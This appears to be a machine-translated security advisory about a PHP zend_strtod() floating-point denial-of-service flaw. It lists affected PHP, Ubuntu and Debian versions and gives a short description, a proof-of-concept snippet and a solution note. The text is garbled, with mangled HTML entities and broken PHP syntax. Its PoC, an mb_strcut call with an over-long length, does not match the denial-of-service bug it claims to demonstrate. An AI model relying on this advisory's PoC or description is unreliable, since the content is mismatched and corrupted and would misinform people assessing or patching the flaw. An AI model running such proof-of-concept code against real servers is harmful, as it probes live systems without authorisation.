PHP & amp; #39; zend_strtodd () & amp; #39; function floating point value Denial Of Service Vulnerability and repair

Affected Versions:
PHP 5.3.2
PHP 5.3.1
PHP 5.3
PHP 5.2.15
PHP 5.2.13
PHP 5.2.12
PHP 5.2.11
PHP 5.2.10
PHP 5.2.9-2
PHP 5.2.9
PHP 5.2.8
PHP 5.2.7
PHP 5.2.6
PHP 5.2.5
PHP 5.2.4
PHP 5.2.3
PHP 5.2.2
PHP 5.2.1
Ubuntu Linux 7.04
Ubuntu Linux 7.04 powerpc
Ubuntu Linux 7.04 i386
Ubuntu, Ubuntu, Linux 7.04, amd64
PHP 5.1.6
Ubuntu Linux 6.10
Ubuntu Linux 6.10 powerpc
Ubuntu Linux 6.10 i386
Ubuntu, Ubuntu, Linux 6.10, amd64
PHP 5.1.5
PHP 5.1.4
PHP 5.1.3-RC1
PHP 5.1.3
PHP 5.1.2
Ubuntu Linux 6.06 LTS
Ubuntu Linux 6.06 LTS powerpc
Ubuntu Linux 6.06 LTS i386
Ubuntu Linux 6.06 LTS amd64
PHP 5.1.1
PHP 5.1
PHP 5.0.5
PHP 5.0.4
PHP 5.0.3
Trustix Secure Linux 2.2
PHP 5.0.2
PHP 5.0.1
PHP 5.0 candidate 3
PHP 5.0 candidate 2
PHP 5.0 candidate 1
PHP 5.0. 0
PHP 5.3.3
PHP 5.2.14
PHP 5.2
Debian Linux 4.0
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 IA-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0.

 

Vulnerability description:

PHP is vulnerable to remote denial of service vulnerabilities.
Successful attacks will cause applications written in PHP to be suspended and create a denial of service condition.
PHP 5.3.3 is fragile, and other versions may also be affected.

<* Reference
Http://sebug.net/
*>

Test method:
The following proof of concept code is available:
& Lt ;? Php
$ B = "bbbbbbbbbbbbb ";
Str_repeat ("this is a secret message, isnt it? ", 1 );
$ Var3 = mb_strcut ($ B, 0, 1000 );
Echo $ var3;
? & Gt;

Solution:
Currently, we do not have any vendor-provided patches. Please refer to the official website for more information.